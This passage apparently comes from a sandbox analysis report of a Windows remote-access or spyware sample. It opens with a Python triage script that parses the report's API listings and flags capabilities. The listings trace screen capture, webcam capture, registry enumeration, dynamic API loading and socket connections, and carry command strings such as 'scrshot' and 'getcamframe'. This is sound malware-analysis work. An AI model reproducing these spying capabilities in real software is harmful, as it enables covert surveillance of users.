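       "9": "operator!=", "B": "conversion-op", "H": "operator+", "Y": "operator+=", "_D": "vbase-dtor"}

# API sets that, taken together, indicate a capability. Editor's heuristic, tuned to this listing.
CAPABILITIES = {
    "screen capture via GDI": {"CreateDCA", "CreateCompatibleDC", "CreateCompatibleBitmap"},
    "GDI+ image encoding": {"GdiplusStartup"},
    "dynamic API resolution": {"LoadLibraryA", "GetProcAddress"},
    "file attribute modification": {"SetFileAttributesA"},
    "path building from environment": {"getenv"},
    "whole-file read into heap buffer": {"basic_istream::tellg", "basic_istream::seekg", "basic_istream::read"},
    "socket teardown": {"closesocket"},
}

def short_name(name):
    """Collapse an MSVC-mangled C++ name to 'class::member'; plain C names pass through."""
    if not name.startswith("?"):
        return name
    rest = name[1:]
    if rest.startswith("?"):                       # operator or special member function
        rest = rest[1:]
        code = rest[:2] if rest[0] == "_" else rest[0]
        member, rest = OPS.get(code, "op" + code), rest[len(code):]
    else:
        member, _, rest = rest.partition("@")
    cls = re.match(r"[A-Za-z_]\w*", rest.lstrip("?$"))   # '?$basic_string@..' -> basic_string
    return f"{cls.group(0)}::{member}" if cls else member

def parse_listing(text):
    """One dict per 'APIs' block: calls as (short_name, module, ref, is_subcall) plus String IDs."""
    functions, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "strings": []}
            functions.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            cur["calls"].append((short_name(m["name"]), m["module"], int(m["ref"], 16), m["sub"] is not None))
        elif cur is not None and (m := STRING_RE.match(line)):
            cur["strings"].extend(s for s in m["s"].split("$") if s)
    return functions

def capabilities(fn, include_subcalls=True):
    """Capabilities whose whole API set occurs in the function (subcall attributions optional)."""
    seen = {c[0] for c in fn["calls"] if include_subcalls or not c[3]}
    return sorted(cap for cap, apis in CAPABILITIES.items() if apis <= seen)

def triage(text):
    """Key each function by its first directly attributed ref; report capabilities and strings."""
    out = {}
    for fn in parse_listing(text):
        own = [c for c in fn["calls"] if not c[3]]
        key = f"{own[0][2]:08X}" if own else "????????"
        out[key] = {"caps": capabilities(fn), "strings": fn["strings"]}
    return out

# Constructed sample: lines copied from three of the function listings above, trimmed.
SAMPLE = """\
APIs
• _EH_prolog.MSVCRT ref: 0040E15C
• GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000), ref: 0040E18F
• CreateDirectoryA.KERNEL32(00000000), ref: 0040E1EC
• Sleep.KERNEL32(000003E8), ref: 0040E251
• ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000003,?,?,?,?,?,?,?,?,00000000), ref: 0040E334
  • Part of subcall function 0040DECB: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
  • Part of subcall function 0040DECB: GetProcAddress.KERNEL32(00000000), ref: 0040DF22
• String ID: .png$dat
APIs
• getenv.MSVCRT ref: 004071BE
• ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004071D4
• GetLongPathNameA.KERNEL32(00000000), ref: 00407299
• String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\\SysWOW64$\\system32
APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
  • Part of subcall function 0040D71E: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
  • Part of subcall function 0040D71E: CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
  • Part of subcall function 0040D71E: CreateCompatibleBitmap.GDI32(00000000,76F90F00,00000000), ref: 0040D760
• ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
• ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
• ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040E003
"""

if __name__ == "__main__":
    for addr, info in triage(SAMPLE).items():
        print(addr, info["caps"], info["strings"])
```

Two caveats when using this on a full report: the argument values in parentheses are raw stack slots recovered by the IDA plugin, so a value such as `00000080` next to `SetFileAttributesA` is a hint, not a decoded flag, and the `Part of subcall` attribution means a capability found with `include_subcalls=True` may live in a callee rather than in the function whose ref keys the result; pass `include_subcalls=False` to see only what the function calls directly.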
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                              • mbstowcs.MSVCRT ref: 0040DEF8
                                • Part of subcall function 0040D71E: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                • Part of subcall function 0040D71E: CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                • Part of subcall function 0040D71E: CreateCompatibleBitmap.GDI32(00000000,76F90F00,00000000), ref: 0040D760
                                • Part of subcall function 0040D71E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                              • GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040E003
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E00F
                              • DeleteFileA.KERNEL32(0040E3AF,?,?,?,?,00000000), ref: 0040E018
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E025
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040E02E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0040E3AF,?,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040E06A
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E073
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000003,?,?,?,?,00000000), ref: 0040E080
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,dat,?,?,?,?,00000000), ref: 0040E093
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E09F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,00000001,?,?,?,?,?,?,?,00000000), ref: 0040E0B5
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0C2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0D4
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0E1
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0ED
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0F9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E102
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E10B
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E117
                                • Part of subcall function 0040DDA1: GdipDisposeImage.GDIPLUS(?,0040E125,?,?,?,?,00000000), ref: 0040DDAA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000), ref: 0040E128
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • String ID: Shlwapi.dll$dat$image/png
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 00401CD1
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401CE0
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00401D00
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,camdlldata), ref: 00401D15
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401D2D
                                • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 0040530E
                                • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initcamcap,00415268,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401D9F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DA9
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getcamframe), ref: 00401DCA
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401E30
                              • atoi.MSVCRT ref: 00401E37
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004151F0), ref: 00401F14
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F1D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F2E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$camdlldata$closecam$getcamframe$getcamsingleframe$initcamcap$nocamera$startcamcap
                              APIs
                              • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,76E50440,00415268,6A41AFB0), ref: 0040DA80
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,76E50440,00415268,6A41AFB0), ref: 0040DA94
                              • GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(76E50440,00415268,6A41AFB0), ref: 0040DAB3
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040DBA9
                              • _itoa.MSVCRT ref: 0040DBB0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initializescrcap,00415268,?,00415268,?,00415268,00415B18), ref: 0040DC15
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,00415B18), ref: 0040DC22
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415B18), ref: 0040DC2F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC3F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC4C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC68
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC74
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC7D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC86
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040DC56
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,scrshot,00415268,?,00415268,?), ref: 0040DCAE
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040DCBB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040DCC8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040DCD2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCE7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD02
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD16
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                • Part of subcall function 004021EB: CreateThread.KERNEL32(00000000,00000000,0040220A,00415AC0,00000000,00000000), ref: 00402200
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • String ID: Shlwapi.dll$image/jpeg$initializescrcap$scrshot
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00415268,00000000), ref: 0040958B
                                • Part of subcall function 004094DE: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                • Part of subcall function 004094DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00409BF5), ref: 004095A9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regopened,00415268,00410844,00415268,00415A00,00415268,00415998,00415268,004159E8,00415268,00415A10), ref: 004095FC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004159E8,00415268,00415A10), ref: 00409609
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415A10), ref: 00409616
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409623
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409630
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040963D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040964A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040965A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040966A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409674
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040968C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409698
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096A1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096AA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096B3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096BC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096C5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096CE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096D7
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096E8
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096F4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00409700
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 0040970C
                              • RegCloseKey.ADVAPI32(00409BF5), ref: 00409715
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regmsg,00415268,00410848), ref: 00409737
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410848), ref: 00409741
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 00409756
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 0040975F
                                • Part of subcall function 0040926A: RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                • Part of subcall function 0040926A: RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                • Part of subcall function 0040926A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                • Part of subcall function 0040926A: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                • Part of subcall function 0040926A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • String ID: regmsg$regopened
                              APIs
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C,?,?,?,?,?,?,?,Ox@), ref: 00406360
